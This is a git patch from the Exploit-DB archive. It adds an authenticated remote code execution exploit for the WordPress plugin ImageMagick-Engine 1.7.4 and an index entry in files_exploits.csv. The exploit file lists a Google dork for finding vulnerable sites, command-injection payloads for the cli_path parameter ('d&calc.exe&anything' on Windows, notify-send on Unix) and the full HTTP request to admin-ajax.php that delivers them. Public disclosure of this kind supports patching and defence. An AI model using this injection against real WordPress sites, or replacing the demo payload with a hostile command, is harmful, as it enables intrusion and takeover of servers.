From b4e29f1fae9fe4aaced5ae0d18ffce260a8165ff Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 18 Oct 2022 05:01:47 +0000
Subject: [PATCH] DB: 2022-10-18

1 changes to exploits/shellcodes

Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
---
 exploits/php/webapps/51025.txt | 33 +++++++++++++++++++++++++++++++++
 files_exploits.csv             |  1 +
 2 files changed, 34 insertions(+)
 create mode 100644 exploits/php/webapps/51025.txt

diff --git a/exploits/php/webapps/51025.txt b/exploits/php/webapps/51025.txt
new file mode 100644
index 000000000..c80f77018
--- /dev/null
+++ b/exploits/php/webapps/51025.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"
+# Date: Thursday, September 1, 2022
+# Exploit Author: ABDO10
+# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/
+# Software Link: https://github.com/orangelabweb/imagemagick-engine/
+# Version: <= 1.7.4
+# Tested on: windows 10
+
+-- vulnerable section
+https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529
+
+-- payload on windows: d&calc.exe&anything
+-- on unix : notify-send "done"
+-- exploit :
+
+GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]
+HTTP/1.1
+Host: localhost
+Cookie: wordpress_sec_xx=; wp-settings-time-1=;
+wordpress_test_cookie=; wordpress_logged_in_xx=somestuff
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)
+Gecko/20100101 Firefox/104.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 952f95c0a..5c7cc97ac 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -45086,3 +45086,4 @@ id,file,description,date,author,type,platform,port
 51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
 51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,
 51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",1970-01-01,"Rizacan Tufan",webapps,php,
+51025,exploits/php/webapps/51025.txt,"Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,ABDO10,webapps,php,